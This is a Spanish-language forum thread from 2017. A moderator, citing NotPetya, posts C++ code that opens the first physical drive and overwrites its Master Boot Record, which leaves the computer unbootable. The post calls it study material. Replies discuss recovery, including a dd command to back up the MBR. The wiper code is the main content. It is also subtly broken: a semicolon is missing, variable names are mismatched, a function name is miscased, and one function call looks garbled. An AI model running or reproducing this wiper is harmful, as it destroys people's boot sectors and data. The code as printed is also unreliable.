3. Reescribiendo el Boot Master Record
Páginas: [1]   Ir Abajo
« anterior próximo »

Reescribiendo el Boot Master Record

  • 4 Respuestas
  • 6865 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado sadfud

  • *
  • Moderator
  • Mensajes: 190
  • Actividad:
    36.67%
  • Reputación 9
  • Skype: SadFud
    • Ver Perfil
    • Blog

Reescribiendo el Boot Master Record

  • en: Julio 06, 2017, 02:42:53 pm

Buenas underc0deanos,

Supongo que todo el mundo ha visto las noticias de NotPetya, y si alguno ha leído los análisis técnicos sabrá que era un wiper y no un ransomware, debido a que reescribe el sector de arranque del disco duro dejando el pc inservible una vez se haya reiniciado/apagado.

A continuación dejo un código que tenia guardado sobre como hacer esto.

Espero que sea útil para poder estudiarlo.
 
Código: C++
  1. /*
  2.   Rewrite boot master record code sample
  3.   Credits to 0memory
  4. */
  5. #include <windows.h>
  6. #include <iostream>
  7.  
  8. using namespace std;
  9.  
  10. #define MBR_SIZE 512
  11. int main(int argc, char const *argv[]) {
  12.   DWORD write;
  13.   char mbrdata[MBR_SIZE];
  14.   Underc0de(&mbrData, (sizeof mbrdata));
  15.  
  16.   HANDLE MasterBootRecord = CreateFile("\\\\.\\PhysicalDrive0", GENERIC_ALL, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, NULL, NULL)
  17.   if (WriteFile(MasterBootRecord, mbrData, MBR_SIZE, &write, NULL) == TRUE){
  18.     cout << "MBR overwritten" << endl;
  19.     Sleep(5000);
  20.     Exitprocess(0);
  21.   } else {
  22.     cout << "MBR not overwritten" << endl;
  23.     Sleep(5000);
  24.     Exitprocess(0);
  25.   }
  26.   CloseHandle(MasterBootRecord);
  27.   return 0;
  28. }

Un saludo
« Última modificación: Julio 06, 2017, 03:00:31 pm por Gabriela »
En línea
Si necesitas ayuda, no dudes en mandar MP

Desconectado RuidosoBSD

  • *
  • Underc0der
  • Mensajes: 183
  • Actividad:
    0%
  • Reputación 2
    • Ver Perfil
    • Email

Re:Reescribiendo el Boot Master Record

  • en: Julio 06, 2017, 06:19:07 pm
Gracias por el aporte. Puede resolverse con un disco de recuperacion ¿no?
En línea

Desconectado PikachuDorado

  • *
  • Underc0der
  • Mensajes: 372
  • Actividad:
    0%
  • Reputación 1
  • Im just a Pikachu
    • Ver Perfil
    • Soporte Ava

Re:Reescribiendo el Boot Master Record

  • en: Julio 12, 2017, 07:44:18 am
Estas cada dia mas violento @sadfud sos un crack! ♥
En línea
Pikaa~

Conectado animanegra

  • *
  • Colaborador
  • *
  • Mensajes: 206
  • Actividad:
    26.67%
  • Reputación 8
    • Ver Perfil

Re:Reescribiendo el Boot Master Record

  • en: Julio 12, 2017, 06:05:57 pm
El MBR son los primero 512 KB del disco duro (recordarme la dimension si estoy confundido), lo mas sencillo es hacer lo que se hacia antes cuando instalar linux y windows era problematico. Haces un:
dd if=/dev/sda of=copiaMBR bs=512 count=1
y asi tienes una copia del MBR por si las moscas. ^^
Para restaurarla poner el if y el of en sentido inverso y listos.

El petya y esos ¿Solo joden el MBR?
En línea


Lo siento, no contesto dudas por MP, si tienes dudas las planteas en el foro para que se aproveche toda la comunidad.

42

Desconectado RuidosoBSD

  • *
  • Underc0der
  • Mensajes: 183
  • Actividad:
    0%
  • Reputación 2
    • Ver Perfil
    • Email

Re:Reescribiendo el Boot Master Record

  • en: Julio 13, 2017, 05:24:43 am
Cita de: animanegra en Julio 12, 2017, 06:05:57 pm
El petya y esos ¿Solo joden el MBR?
No, es una de las características pero no la única
En línea
Páginas: [1]   Ir Arriba
« anterior próximo »